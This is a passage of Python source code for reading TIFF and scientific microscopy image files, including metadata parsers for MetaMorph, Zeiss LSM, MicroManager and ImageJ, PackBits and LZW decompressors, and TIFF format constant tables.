self._fh.fileno() self.is_file = True except Exception: self.is_file = False def read(self, size=-1): """Read 'size' bytes from file, or until EOF is reached.""" if size < 0 and self._offset: size = self._size return self._fh.read(size) def memmap_array(self, dtype, shape, offset=0, mode='r', order='C'): """Return numpy.memmap of data stored in file.""" if not self.is_file: raise ValueError("Can not memory map file without fileno.") return numpy.memmap(self._fh, dtype=dtype, mode=mode, offset=self._offset + offset, shape=shape, order=order) def read_array(self, dtype, count=-1, sep=""): """Return numpy array from file. Work around numpy issue #2230, "numpy.fromfile does not accept StringIO object" https://github.com/numpy/numpy/issues/2230. 
""" try: return numpy.fromfile(self._fh, dtype, count, sep) except IOError: if count < 0: size = self._size else: size = count * numpy.dtype(dtype).itemsize data = self._fh.read(size) return numpy.fromstring(data, dtype, count, sep) def read_record(self, dtype, shape=1, byteorder=None): """Return numpy record from file.""" try: rec = numpy.rec.fromfile(self._fh, dtype, shape, byteorder=byteorder) except Exception: dtype = numpy.dtype(dtype) if shape is None: shape = self._size // dtype.itemsize size = product(sequence(shape)) * dtype.itemsize data = self._fh.read(size) return numpy.rec.fromstring(data, dtype, shape, byteorder=byteorder) return rec[0] if shape == 1 else rec def tell(self): """Return file's current position.""" return self._fh.tell() - self._offset def seek(self, offset, whence=0): """Set file's current position.""" if self._offset: if whence == 0: self._fh.seek(self._offset + offset, whence) return elif whence == 2: self._fh.seek(self._offset + self._size + offset, 0) return self._fh.seek(offset, whence) def close(self): """Close file.""" if self._close and self._fh: self._fh.close() self._fh = None self.is_file = False def __enter__(self): return self def __exit__(self, exc_type, exc_value, traceback): self.close() def __getattr__(self, name): """Return attribute from underlying file object.""" if self._offset: warnings.warn( "FileHandle: '%s' not implemented for embedded files" % name) return getattr(self._fh, name) @property def name(self): return self._name @property def dirname(self): return self._dir @property def path(self): return os.path.join(self._dir, self._name) @property def size(self): return self._size @property def closed(self): return self._fh is None def read_bytes(fh, byteorder, dtype, count): """Read tag data from file and return as byte string.""" dtype = 'b' if dtype[-1] == 's' else byteorder+dtype[-1] return fh.read_array(dtype, count).tostring() def read_numpy(fh, byteorder, dtype, count): """Read tag data from file and return as numpy array.""" dtype = 'b' if dtype[-1] == 's' else byteorder+dtype[-1] return fh.read_array(dtype, count) def read_json(fh, byteorder, dtype, count): """Read JSON tag data from file and return as object.""" data = fh.read(count) try: return json.loads(unicode(stripnull(data), 'utf-8')) except ValueError: warnings.warn("invalid JSON `%s`" % data) def read_mm_header(fh, byteorder, dtype, count): """Read MM_HEADER tag from file and return as numpy.rec.array.""" return fh.read_record(MM_HEADER, byteorder=byteorder) def read_mm_stamp(fh, byteorder, dtype, count): """Read MM_STAMP tag from file and return as numpy.array.""" return fh.read_array(byteorder+'f8', 8) def read_uic1tag(fh, byteorder, dtype, count, plane_count=None): """Read MetaMorph STK UIC1Tag from file and return as dictionary. Return empty dictionary if plane_count is unknown. 
""" assert dtype in ('2I', '1I') and byteorder == '<' result = {} if dtype == '2I': # pre MetaMorph 2.5 (not tested) values = fh.read_array('<u4', 2*count).reshape(count, 2) result = {'z_distance': values[:, 0] / values[:, 1]} elif plane_count: for i in range(count): tagid = struct.unpack('<I', fh.read(4))[0] if tagid in (28, 29, 37, 40, 41): # silently skip unexpected tags fh.read(4) continue name, value = read_uic_tag(fh, tagid, plane_count, offset=True) result[name] = value return result def read_uic2tag(fh, byteorder, dtype, plane_count): """Read MetaMorph STK UIC2Tag from file and return as dictionary.""" assert dtype == '2I' and byteorder == '<' values = fh.read_array('<u4', 6*plane_count).reshape(plane_count, 6) return { 'z_distance': values[:, 0] / values[:, 1], 'date_created': values[:, 2], # julian days 'time_created': values[:, 3], # milliseconds 'date_modified': values[:, 4], # julian days 'time_modified': values[:, 5], # milliseconds } def read_uic3tag(fh, byteorder, dtype, plane_count): """Read MetaMorph STK UIC3Tag from file and return as dictionary.""" assert dtype == '2I' and byteorder == '<' values = fh.read_array('<u4', 2*plane_count).reshape(plane_count, 2) return {'wavelengths': values[:, 0] / values[:, 1]} def read_uic4tag(fh, byteorder, dtype, plane_count): """Read MetaMorph STK UIC4Tag from file and return as dictionary.""" assert dtype == '1I' and byteorder == '<' result = {} while True: tagid = struct.unpack('<H', fh.read(2))[0] if tagid == 0: break name, value = read_uic_tag(fh, tagid, plane_count, offset=False) result[name] = value return result def read_uic_tag(fh, tagid, plane_count, offset): """Read a single UIC tag value from file and return tag name and value. UIC1Tags use an offset. """ def read_int(count=1): value = struct.unpack('<%iI' % count, fh.read(4*count)) return value[0] if count == 1 else value try: name, dtype = UIC_TAGS[tagid] except KeyError: # unknown tag return '_tagid_%i' % tagid, read_int() if offset: pos = fh.tell() if dtype not in (int, None): off = read_int() if off < 8: warnings.warn("invalid offset for uic tag '%s': %i" % (name, off)) return name, off fh.seek(off) if dtype is None: # skip name = '_' + name value = read_int() elif dtype is int: # int value = read_int() elif dtype is Fraction: # fraction value = read_int(2) value = value[0] / value[1] elif dtype is julian_datetime: # datetime value = julian_datetime(*read_int(2)) elif dtype is read_uic_image_property: # ImagePropertyEx value = read_uic_image_property(fh) elif dtype is str: # pascal string size = read_int() if 0 <= size < 2**10: value = struct.unpack('%is' % size, fh.read(size))[0][:-1] value = stripnull(value) elif offset: value = '' warnings.warn("corrupt string in uic tag '%s'" % name) else: raise ValueError("invalid string size %i" % size) elif dtype == '%ip': # sequence of pascal strings value = [] for i in range(plane_count): size = read_int() if 0 <= size < 2**10: string = struct.unpack('%is' % size, fh.read(size))[0][:-1] string = stripnull(string) value.append(string) elif offset: warnings.warn("corrupt string in uic tag '%s'" % name) else: raise ValueError("invalid string size %i" % size) else: # struct or numpy type dtype = '<' + dtype if '%i' in dtype: dtype = dtype % plane_count if '(' in dtype: # numpy type value = fh.read_array(dtype, 1)[0] if value.shape[-1] == 2: # assume fractions value = value[..., 0] / value[..., 1] else: # struct format value = struct.unpack(dtype, fh.read(struct.calcsize(dtype))) if len(value) == 1: value = value[0] if offset: 
fh.seek(pos + 4) return name, value def read_uic_image_property(fh): """Read UIC ImagePropertyEx tag from file and return as dict.""" # TODO: test this size = struct.unpack('B', fh.read(1))[0] name = struct.unpack('%is' % size, fh.read(size))[0][:-1] flags, prop = struct.unpack('<IB', fh.read(5)) if prop == 1: value = struct.unpack('II', fh.read(8)) value = value[0] / value[1] else: size = struct.unpack('B', fh.read(1))[0] value = struct.unpack('%is' % size, fh.read(size))[0] return dict(name=name, flags=flags, value=value) def read_cz_lsm_info(fh, byteorder, dtype, count): """Read CS_LSM_INFO tag from file and return as numpy.rec.array.""" assert byteorder == '<' magic_number, structure_size = struct.unpack('<II', fh.read(8)) if magic_number not in (50350412, 67127628): raise ValueError("not a valid CS_LSM_INFO structure") fh.seek(-8, 1) if structure_size < numpy.dtype(CZ_LSM_INFO).itemsize: # adjust structure according to structure_size cz_lsm_info = [] size = 0 for name, dtype in CZ_LSM_INFO: size += numpy.dtype(dtype).itemsize if size > structure_size: break cz_lsm_info.append((name, dtype)) else: cz_lsm_info = CZ_LSM_INFO return fh.read_record(cz_lsm_info, byteorder=byteorder) def read_cz_lsm_floatpairs(fh): """Read LSM sequence of float pairs from file and return as list.""" size = struct.unpack('<i', fh.read(4))[0] return fh.read_array('<2f8', count=size) def read_cz_lsm_positions(fh): """Read LSM positions from file and return as list.""" size = struct.unpack('<I', fh.read(4))[0] return fh.read_array('<2f8', count=size) def read_cz_lsm_time_stamps(fh): """Read LSM time stamps from file and return as list.""" size, count = struct.unpack('<ii', fh.read(8)) if size != (8 + 8 * count): raise ValueError("lsm_time_stamps block is too short") # return struct.unpack('<%dd' % count, fh.read(8*count)) return fh.read_array('<f8', count=count) def read_cz_lsm_event_list(fh): """Read LSM events from file and return as list of (time, type, text).""" count = struct.unpack('<II', fh.read(8))[1] events = [] while count > 0: esize, etime, etype = struct.unpack('<IdI', fh.read(16)) etext = stripnull(fh.read(esize - 16)) events.append((etime, etype, etext)) count -= 1 return events def read_cz_lsm_scan_info(fh): """Read LSM scan information from file and return as Record.""" block = Record() blocks = [block] unpack = struct.unpack if 0x10000000 != struct.unpack('<I', fh.read(4))[0]: # not a Recording sub block raise ValueError("not a lsm_scan_info structure") fh.read(8) while True: entry, dtype, size = unpack('<III', fh.read(12)) if dtype == 2: # ascii value = stripnull(fh.read(size)) elif dtype == 4: # long value = unpack('<i', fh.read(4))[0] elif dtype == 5: # rational value = unpack('<d', fh.read(8))[0] else: value = 0 if entry in CZ_LSM_SCAN_INFO_ARRAYS: blocks.append(block) name = CZ_LSM_SCAN_INFO_ARRAYS[entry] newobj = [] setattr(block, name, newobj) block = newobj elif entry in CZ_LSM_SCAN_INFO_STRUCTS: blocks.append(block) newobj = Record() block.append(newobj) block = newobj elif entry in CZ_LSM_SCAN_INFO_ATTRIBUTES: name = CZ_LSM_SCAN_INFO_ATTRIBUTES[entry] setattr(block, name, value) elif entry == 0xffffffff: # end sub block block = blocks.pop() else: # unknown entry setattr(block, "entry_0x%x" % entry, value) if not blocks: break return block def read_nih_image_header(fh, byteorder, dtype, count): """Read NIH_IMAGE_HEADER tag from file and return as numpy.rec.array.""" a = fh.read_record(NIH_IMAGE_HEADER, byteorder=byteorder) a = a.newbyteorder(byteorder) a.xunit = a.xunit[:a._xunit_len] 
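
# Illustrative sketch: the nested Record returned by read_cz_lsm_scan_info
# above mirrors the block structure of a Zeiss LSM file, e.g.
# recording -> tracks -> detection_channels.  The file name is a
# placeholder, and which attributes exist depends on the recording block.
def _demo_lsm_scan_info(filename='example.lsm'):
    """Return the recording name and the names of its tracks."""
    with TiffFile(filename) as tif:
        page = tif[0]
        fh = page.parent.filehandle
        fh.seek(page.cz_lsm_info.offset_scan_info)
        info = read_cz_lsm_scan_info(fh)
    return info.name, [track.name for track in info.tracks]
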
a.um = a.um[:a._um_len] return a def read_micromanager_metadata(fh): """Read MicroManager non-TIFF settings from open file and return as dict. The settings can be used to read image data without parsing the TIFF file. Raise ValueError if file does not contain valid MicroManager metadata. """ fh.seek(0) try: byteorder = {b'II': '<', b'MM': '>'}[fh.read(2)] except IndexError: raise ValueError("not a MicroManager TIFF file") results = {} fh.seek(8) (index_header, index_offset, display_header, display_offset, comments_header, comments_offset, summary_header, summary_length ) = struct.unpack(byteorder + "IIIIIIII", fh.read(32)) if summary_header != 2355492: raise ValueError("invalid MicroManager summary_header") results['summary'] = read_json(fh, byteorder, None, summary_length) if index_header != 54773648: raise ValueError("invalid MicroManager index_header") fh.seek(index_offset) header, count = struct.unpack(byteorder + "II", fh.read(8)) if header != 3453623: raise ValueError("invalid MicroManager index_header") data = struct.unpack(byteorder + "IIIII"*count, fh.read(20*count)) results['index_map'] = { 'channel': data[::5], 'slice': data[1::5], 'frame': data[2::5], 'position': data[3::5], 'offset': data[4::5]} if display_header != 483765892: raise ValueError("invalid MicroManager display_header") fh.seek(display_offset) header, count = struct.unpack(byteorder + "II", fh.read(8)) if header != 347834724: raise ValueError("invalid MicroManager display_header") results['display_settings'] = read_json(fh, byteorder, None, count) if comments_header != 99384722: raise ValueError("invalid MicroManager comments_header") fh.seek(comments_offset) header, count = struct.unpack(byteorder + "II", fh.read(8)) if header != 84720485: raise ValueError("invalid MicroManager comments_header") results['comments'] = read_json(fh, byteorder, None, count) return results def imagej_metadata(data, bytecounts, byteorder): """Return dict from ImageJ metadata tag value.""" _str = str if sys.version_info[0] < 3 else lambda x: str(x, 'cp1252') def read_string(data, byteorder): return _str(stripnull(data[0 if byteorder == '<' else 1::2])) def read_double(data, byteorder): return struct.unpack(byteorder+('d' * (len(data) // 8)), data) def read_bytes(data, byteorder): #return struct.unpack('b' * len(data), data) return numpy.fromstring(data, 'uint8') metadata_types = { # big endian b'info': ('info', read_string), b'labl': ('labels', read_string), b'rang': ('ranges', read_double), b'luts': ('luts', read_bytes), b'roi ': ('roi', read_bytes), b'over': ('overlays', read_bytes)} metadata_types.update( # little endian dict((k[::-1], v) for k, v in metadata_types.items())) if not bytecounts: raise ValueError("no ImageJ metadata") if not data[:4] in (b'IJIJ', b'JIJI'): raise ValueError("invalid ImageJ metadata") header_size = bytecounts[0] if header_size < 12 or header_size > 804: raise ValueError("invalid ImageJ metadata header size") ntypes = (header_size - 4) // 8 header = struct.unpack(byteorder+'4sI'*ntypes, data[4:4+ntypes*8]) pos = 4 + ntypes * 8 counter = 0 result = {} for mtype, count in zip(header[::2], header[1::2]): values = [] name, func = metadata_types.get(mtype, (_str(mtype), read_bytes)) for _ in range(count): counter += 1 pos1 = pos + bytecounts[counter] values.append(func(data[pos:pos1], byteorder)) pos = pos1 result[name.strip()] = values[0] if count == 1 else values return result def imagej_description(description): """Return dict from ImageJ image_description tag.""" def _bool(val): return {b'true': True, 
b'false': False}[val.lower()] _str = str if sys.version_info[0] < 3 else lambda x: str(x, 'cp1252') result = {} for line in description.splitlines(): try: key, val = line.split(b'=') except Exception: continue key = key.strip() val = val.strip() for dtype in (int, float, _bool, _str): try: val = dtype(val) break except Exception: pass result[_str(key)] = val return result def _replace_by(module_function, package=None, warn=False): """Try replace decorated function by module.function.""" try: from importlib import import_module except ImportError: warnings.warn('could not import module importlib') return lambda func: func def decorate(func, module_function=module_function, warn=warn): try: module, function = module_function.split('.') if not package: module = import_module(module) else: module = import_module('.' + module, package=package) func, oldfunc = getattr(module, function), func globals()['__old_' + func.__name__] = oldfunc except Exception: if warn: warnings.warn("failed to import %s" % module_function) return func return decorate def decodejpg(encoded, tables=b'', photometric=None, ycbcr_subsampling=None, ycbcr_positioning=None): """Decode JPEG encoded byte string (using _czifile extension module).""" import _czifile image = _czifile.decodejpg(encoded, tables) if photometric == 'rgb' and ycbcr_subsampling and ycbcr_positioning: # TODO: convert YCbCr to RGB pass return image.tostring() @_replace_by('_tifffile.decodepackbits') def decodepackbits(encoded): """Decompress PackBits encoded byte string. PackBits is a simple byte-oriented run-length compression scheme. """ func = ord if sys.version[0] == '2' else lambda x: x result = [] result_extend = result.extend i = 0 try: while True: n = func(encoded[i]) + 1 i += 1 if n < 129: result_extend(encoded[i:i+n]) i += n elif n > 129: result_extend(encoded[i:i+1] * (258-n)) i += 1 except IndexError: pass return b''.join(result) if sys.version[0] == '2' else bytes(result) @_replace_by('_tifffile.decodelzw') def decodelzw(encoded): """Decompress LZW (Lempel-Ziv-Welch) encoded TIFF strip (byte string). The strip must begin with a CLEAR code and end with an EOI code. This is an implementation of the LZW decoding algorithm described in (1). It is not compatible with old style LZW compressed files like quad-lzw.tif. 
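
# Example: imagej_description above turns the ImageJ header stored in the
# image_description tag into typed Python values.
def _demo_imagej_description():
    """Parse a minimal ImageJ description string."""
    desc = b'ImageJ=1.11a\nimages=510\nhyperstack=true\n'
    return imagej_description(desc)
    # {'ImageJ': '1.11a', 'images': 510, 'hyperstack': True}
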
""" len_encoded = len(encoded) bitcount_max = len_encoded * 8 unpack = struct.unpack if sys.version[0] == '2': newtable = [chr(i) for i in range(256)] else: newtable = [bytes([i]) for i in range(256)] newtable.extend((0, 0)) def next_code(): """Return integer of `bitw` bits at `bitcount` position in encoded.""" start = bitcount // 8 s = encoded[start:start+4] try: code = unpack('>I', s)[0] except Exception: code = unpack('>I', s + b'\x00'*(4-len(s)))[0] code <<= bitcount % 8 code &= mask return code >> shr switchbitch = { # code: bit-width, shr-bits, bit-mask 255: (9, 23, int(9*'1'+'0'*23, 2)), 511: (10, 22, int(10*'1'+'0'*22, 2)), 1023: (11, 21, int(11*'1'+'0'*21, 2)), 2047: (12, 20, int(12*'1'+'0'*20, 2)), } bitw, shr, mask = switchbitch[255] bitcount = 0 if len_encoded < 4: raise ValueError("strip must be at least 4 characters long") if next_code() != 256: raise ValueError("strip must begin with CLEAR code") code = 0 oldcode = 0 result = [] result_append = result.append while True: code = next_code() # ~5% faster when inlining this function bitcount += bitw if code == 257 or bitcount >= bitcount_max: # EOI break if code == 256: # CLEAR table = newtable[:] table_append = table.append lentable = 258 bitw, shr, mask = switchbitch[255] code = next_code() bitcount += bitw if code == 257: # EOI break result_append(table[code]) else: if code < lentable: decoded = table[code] newcode = table[oldcode] + decoded[:1] else: newcode = table[oldcode] newcode += newcode[:1] decoded = newcode result_append(decoded) table_append(newcode) lentable += 1 oldcode = code if lentable in switchbitch: bitw, shr, mask = switchbitch[lentable] if code != 257: warnings.warn("unexpected end of lzw stream (code %i)" % code) return b''.join(result) @_replace_by('_tifffile.unpackints') def unpackints(data, dtype, itemsize, runlen=0): """Decompress byte string to array of integers of any bit size <= 32. Parameters ---------- data : byte str Data to decompress. dtype : numpy.dtype or str A numpy boolean or integer type. itemsize : int Number of bits per integer. runlen : int Number of consecutive integers, after which to start at next byte. """ if itemsize == 1: # bitarray data = numpy.fromstring(data, '|B') data = numpy.unpackbits(data) if runlen % 8: data = data.reshape(-1, runlen + (8 - runlen % 8)) data = data[:, :runlen].reshape(-1) return data.astype(dtype) dtype = numpy.dtype(dtype) if itemsize in (8, 16, 32, 64): return numpy.fromstring(data, dtype) if itemsize < 1 or itemsize > 32: raise ValueError("itemsize out of range: %i" % itemsize) if dtype.kind not in "biu": raise ValueError("invalid dtype") itembytes = next(i for i in (1, 2, 4, 8) if 8 * i >= itemsize) if itembytes != dtype.itemsize: raise ValueError("dtype.itemsize too small") if runlen == 0: runlen = len(data) // itembytes skipbits = runlen*itemsize % 8 if skipbits: skipbits = 8 - skipbits shrbits = itembytes*8 - itemsize bitmask = int(itemsize*'1'+'0'*shrbits, 2) dtypestr = '>' + dtype.char # dtype always big endian? 
unpack = struct.unpack l = runlen * (len(data)*8 // (runlen*itemsize + skipbits)) result = numpy.empty((l, ), dtype) bitcount = 0 for i in range(len(result)): start = bitcount // 8 s = data[start:start+itembytes] try: code = unpack(dtypestr, s)[0] except Exception: code = unpack(dtypestr, s + b'\x00'*(itembytes-len(s)))[0] code <<= bitcount % 8 code &= bitmask result[i] = code >> shrbits bitcount += itemsize if (i+1) % runlen == 0: bitcount += skipbits return result def unpackrgb(data, dtype='<B', bitspersample=(5, 6, 5), rescale=True): """Return array from byte string containing packed samples. Use to unpack RGB565 or RGB555 to RGB888 format. Parameters ---------- data : byte str The data to be decoded. Samples in each pixel are stored consecutively. Pixels are aligned to 8, 16, or 32 bit boundaries. dtype : numpy.dtype The sample data type. The byteorder applies also to the data stream. bitspersample : tuple Number of bits for each sample in a pixel. rescale : bool Upscale samples to the number of bits in dtype. Returns ------- result : ndarray Flattened array of unpacked samples of native dtype. Examples -------- >>> data = struct.pack('BBBB', 0x21, 0x08, 0xff, 0xff) >>> print(unpackrgb(data, '<B', (5, 6, 5), False)) [ 1 1 1 31 63 31] >>> print(unpackrgb(data, '<B', (5, 6, 5))) [ 8 4 8 255 255 255] >>> print(unpackrgb(data, '<B', (5, 5, 5))) [ 16 8 8 255 255 255] """ dtype = numpy.dtype(dtype) bits = int(numpy.sum(bitspersample)) if not (bits <= 32 and all(i <= dtype.itemsize*8 for i in bitspersample)): raise ValueError("sample size not supported %s" % str(bitspersample)) dt = next(i for i in 'BHI' if numpy.dtype(i).itemsize*8 >= bits) data = numpy.fromstring(data, dtype.byteorder+dt) result = numpy.empty((data.size, len(bitspersample)), dtype.char) for i, bps in enumerate(bitspersample): t = data >> int(numpy.sum(bitspersample[i+1:])) t &= int('0b'+'1'*bps, 2) if rescale: o = ((dtype.itemsize * 8) // bps + 1) * bps if o > data.dtype.itemsize * 8: t = t.astype('I') t *= (2**o - 1) // (2**bps - 1) t //= 2**(o - (dtype.itemsize * 8)) result[:, i] = t return result.reshape(-1) def reorient(image, orientation): """Return reoriented view of image array. Parameters ---------- image : numpy array Non-squeezed output of asarray() functions. Axes -3 and -2 must be image length and width respectively. orientation : int or str One of TIFF_ORIENTATIONS keys or values. """ o = TIFF_ORIENTATIONS.get(orientation, orientation) if o == 'top_left': return image elif o == 'top_right': return image[..., ::-1, :] elif o == 'bottom_left': return image[..., ::-1, :, :] elif o == 'bottom_right': return image[..., ::-1, ::-1, :] elif o == 'left_top': return numpy.swapaxes(image, -3, -2) elif o == 'right_top': return numpy.swapaxes(image, -3, -2)[..., ::-1, :] elif o == 'left_bottom': return numpy.swapaxes(image, -3, -2)[..., ::-1, :, :] elif o == 'right_bottom': return numpy.swapaxes(image, -3, -2)[..., ::-1, ::-1, :] def squeeze_axes(shape, axes, skip='XY'): """Return shape and axes with single-dimensional entries removed. Remove unused dimensions unless their axes are listed in 'skip'. >>> squeeze_axes((5, 1, 2, 1, 1), 'TZYXC') ((5, 2, 1), 'TYX') """ if len(shape) != len(axes): raise ValueError("dimensions of axes and shape don't match") shape, axes = zip(*(i for i in zip(shape, axes) if i[0] > 1 or i[1] in skip)) return shape, ''.join(axes) def transpose_axes(data, axes, asaxes='CTZYX'): """Return data with its axes permuted to match specified axes. A view is returned if possible. 
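
# Example for unpackints above: two 0xaa bytes hold four 4-bit samples,
# each with value 0b1010.
def _demo_unpackints():
    """Unpack 4-bit samples from a byte string."""
    return unpackints(b'\xaa\xaa', 'B', 4)
    # array([10, 10, 10, 10], dtype=uint8)
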
>>> transpose_axes(numpy.zeros((2, 3, 4, 5)), 'TYXC', asaxes='CTZYX').shape (5, 2, 1, 3, 4) """ for ax in axes: if ax not in asaxes: raise ValueError("unknown axis %s" % ax) # add missing axes to data shape = data.shape for ax in reversed(asaxes): if ax not in axes: axes = ax + axes shape = (1,) + shape data = data.reshape(shape) # transpose axes data = data.transpose([axes.index(ax) for ax in asaxes]) return data def stack_pages(pages, memmap=False, *args, **kwargs): """Read data from sequence of TiffPage and stack them vertically. If memmap is True, return an array stored in a binary file on disk. Additional parameters are passsed to the page asarray function. """ if len(pages) == 0: raise ValueError("no pages") if len(pages) == 1: return pages[0].asarray(memmap=memmap, *args, **kwargs) result = pages[0].asarray(*args, **kwargs) shape = (len(pages),) + result.shape if memmap: with tempfile.NamedTemporaryFile() as fh: result = numpy.memmap(fh, dtype=result.dtype, shape=shape) else: result = numpy.empty(shape, dtype=result.dtype) for i, page in enumerate(pages): result[i] = page.asarray(*args, **kwargs) return result def stripnull(string): """Return string truncated at first null character. Clean NULL terminated C strings. >>> stripnull(b'string\\x00') b'string' """ i = string.find(b'\x00') return string if (i < 0) else string[:i] def stripascii(string): """Return string truncated at last byte that is 7bit ASCII. Clean NULL separated and terminated TIFF strings. >>> stripascii(b'string\\x00string\\n\\x01\\x00') b'string\\x00string\\n' >>> stripascii(b'\\x00') b'' """ # TODO: pythonize this ord_ = ord if sys.version_info[0] < 3 else lambda x: x i = len(string) while i: i -= 1 if 8 < ord_(string[i]) < 127: break else: i = -1 return string[:i+1] def format_size(size): """Return file size as string from byte size.""" for unit in ('B', 'KB', 'MB', 'GB', 'TB'): if size < 2048: return "%.f %s" % (size, unit) size /= 1024.0 def sequence(value): """Return tuple containing value if value is not a sequence. >>> sequence(1) (1,) >>> sequence([1]) [1] """ try: len(value) return value except TypeError: return (value, ) def product(iterable): """Return product of sequence of numbers. Equivalent of functools.reduce(operator.mul, iterable, 1). >>> product([2**8, 2**30]) 274877906944 >>> product([]) 1 """ prod = 1 for i in iterable: prod *= i return prod def natural_sorted(iterable): """Return human sorted list of strings. E.g. for sorting file names. >>> natural_sorted(['f1', 'f2', 'f10']) ['f1', 'f2', 'f10'] """ def sortkey(x): return [(int(c) if c.isdigit() else c) for c in re.split(numbers, x)] numbers = re.compile(r'(\d+)') return sorted(iterable, key=sortkey) def excel_datetime(timestamp, epoch=datetime.datetime.fromordinal(693594)): """Return datetime object from timestamp in Excel serial format. Convert LSM time stamps. >>> excel_datetime(40237.029999999795) datetime.datetime(2010, 2, 28, 0, 43, 11, 999982) """ return epoch + datetime.timedelta(timestamp) def julian_datetime(julianday, milisecond=0): """Return datetime from days since 1/1/4713 BC and ms since midnight. Convert Julian dates according to MetaMorph. 
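
# Example: format_size above picks the first unit that keeps the value
# below 2048.
def _demo_format_size():
    """Format a byte count for display."""
    return format_size(123456789)   # '118 MB'
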
>>> julian_datetime(2451576, 54362783) datetime.datetime(2000, 2, 2, 15, 6, 2, 783) """ if julianday <= 1721423: # no datetime before year 1 return None a = julianday + 1 if a > 2299160: alpha = math.trunc((a - 1867216.25) / 36524.25) a += 1 + alpha - alpha // 4 b = a + (1524 if a > 1721423 else 1158) c = math.trunc((b - 122.1) / 365.25) d = math.trunc(365.25 * c) e = math.trunc((b - d) / 30.6001) day = b - d - math.trunc(30.6001 * e) month = e - (1 if e < 13.5 else 13) year = c - (4716 if month > 2.5 else 4715) hour, milisecond = divmod(milisecond, 1000 * 60 * 60) minute, milisecond = divmod(milisecond, 1000 * 60) second, milisecond = divmod(milisecond, 1000) return datetime.datetime(year, month, day, hour, minute, second, milisecond) def test_tifffile(directory='testimages', verbose=True): """Read all images in directory. Print error message on failure. >>> test_tifffile(verbose=False) """ successful = 0 failed = 0 start = time.time() for f in glob.glob(os.path.join(directory, '*.*')): if verbose: print("\n%s>\n" % f.lower(), end='') t0 = time.time() try: tif = TiffFile(f, multifile=True) except Exception as e: if not verbose: print(f, end=' ') print("ERROR:", e) failed += 1 continue try: img = tif.asarray() except ValueError: try: img = tif[0].asarray() except Exception as e: if not verbose: print(f, end=' ') print("ERROR:", e) failed += 1 continue finally: tif.close() successful += 1 if verbose: print("%s, %s %s, %s, %.0f ms" % ( str(tif), str(img.shape), img.dtype, tif[0].compression, (time.time()-t0) * 1e3)) if verbose: print("\nSuccessfully read %i of %i files in %.3f s\n" % ( successful, successful+failed, time.time()-start)) class TIFF_SUBFILE_TYPES(object): def __getitem__(self, key): result = [] if key & 1: result.append('reduced_image') if key & 2: result.append('page') if key & 4: result.append('mask') return tuple(result) TIFF_PHOTOMETRICS = { 0: 'miniswhite', 1: 'minisblack', 2: 'rgb', 3: 'palette', 4: 'mask', 5: 'separated', # CMYK 6: 'ycbcr', 8: 'cielab', 9: 'icclab', 10: 'itulab', 32803: 'cfa', # Color Filter Array 32844: 'logl', 32845: 'logluv', 34892: 'linear_raw' } TIFF_COMPESSIONS = { 1: None, 2: 'ccittrle', 3: 'ccittfax3', 4: 'ccittfax4', 5: 'lzw', 6: 'ojpeg', 7: 'jpeg', 8: 'adobe_deflate', 9: 't85', 10: 't43', 32766: 'next', 32771: 'ccittrlew', 32773: 'packbits', 32809: 'thunderscan', 32895: 'it8ctpad', 32896: 'it8lw', 32897: 'it8mp', 32898: 'it8bl', 32908: 'pixarfilm', 32909: 'pixarlog', 32946: 'deflate', 32947: 'dcs', 34661: 'jbig', 34676: 'sgilog', 34677: 'sgilog24', 34712: 'jp2000', 34713: 'nef', } TIFF_DECOMPESSORS = { None: lambda x: x, 'adobe_deflate': zlib.decompress, 'deflate': zlib.decompress, 'packbits': decodepackbits, 'lzw': decodelzw, # 'jpeg': decodejpg } TIFF_DATA_TYPES = { 1: '1B', # BYTE 8-bit unsigned integer. 2: '1s', # ASCII 8-bit byte that contains a 7-bit ASCII code; # the last byte must be NULL (binary zero). 3: '1H', # SHORT 16-bit (2-byte) unsigned integer 4: '1I', # LONG 32-bit (4-byte) unsigned integer. 5: '2I', # RATIONAL Two LONGs: the first represents the numerator of # a fraction; the second, the denominator. 6: '1b', # SBYTE An 8-bit signed (twos-complement) integer. 7: '1s', # UNDEFINED An 8-bit byte that may contain anything, # depending on the definition of the field. 8: '1h', # SSHORT A 16-bit (2-byte) signed (twos-complement) integer. 9: '1i', # SLONG A 32-bit (4-byte) signed (twos-complement) integer. 10: '2i', # SRATIONAL Two SLONGs: the first represents the numerator # of a fraction, the second the denominator. 
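
# Note: TIFF_SUBFILE_TYPES above decodes the new_subfile_type bit mask,
# e.g. TIFF_SUBFILE_TYPES()[5] == ('reduced_image', 'mask').
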
11: '1f', # FLOAT Single precision (4-byte) IEEE format. 12: '1d', # DOUBLE Double precision (8-byte) IEEE format. 13: '1I', # IFD unsigned 4 byte IFD offset. #14: '', # UNICODE #15: '', # COMPLEX 16: '1Q', # LONG8 unsigned 8 byte integer (BigTiff) 17: '1q', # SLONG8 signed 8 byte integer (BigTiff) 18: '1Q', # IFD8 unsigned 8 byte IFD offset (BigTiff) } TIFF_SAMPLE_FORMATS = { 1: 'uint', 2: 'int', 3: 'float', #4: 'void', #5: 'complex_int', 6: 'complex', } TIFF_SAMPLE_DTYPES = { ('uint', 1): '?', # bitmap ('uint', 2): 'B', ('uint', 3): 'B', ('uint', 4): 'B', ('uint', 5): 'B', ('uint', 6): 'B', ('uint', 7): 'B', ('uint', 8): 'B', ('uint', 9): 'H', ('uint', 10): 'H', ('uint', 11): 'H', ('uint', 12): 'H', ('uint', 13): 'H', ('uint', 14): 'H', ('uint', 15): 'H', ('uint', 16): 'H', ('uint', 17): 'I', ('uint', 18): 'I', ('uint', 19): 'I', ('uint', 20): 'I', ('uint', 21): 'I', ('uint', 22): 'I', ('uint', 23): 'I', ('uint', 24): 'I', ('uint', 25): 'I', ('uint', 26): 'I', ('uint', 27): 'I', ('uint', 28): 'I', ('uint', 29): 'I', ('uint', 30): 'I', ('uint', 31): 'I', ('uint', 32): 'I', ('uint', 64): 'Q', ('int', 8): 'b', ('int', 16): 'h', ('int', 32): 'i', ('int', 64): 'q', ('float', 16): 'e', ('float', 32): 'f', ('float', 64): 'd', ('complex', 64): 'F', ('complex', 128): 'D', ('uint', (5, 6, 5)): 'B', } TIFF_ORIENTATIONS = { 1: 'top_left', 2: 'top_right', 3: 'bottom_right', 4: 'bottom_left', 5: 'left_top', 6: 'right_top', 7: 'right_bottom', 8: 'left_bottom', } # TODO: is there a standard for character axes labels? AXES_LABELS = { 'X': 'width', 'Y': 'height', 'Z': 'depth', 'S': 'sample', # rgb(a) 'I': 'series', # general sequence, plane, page, IFD 'T': 'time', 'C': 'channel', # color, emission wavelength 'A': 'angle', 'P': 'phase', # formerly F # P is Position in LSM! 
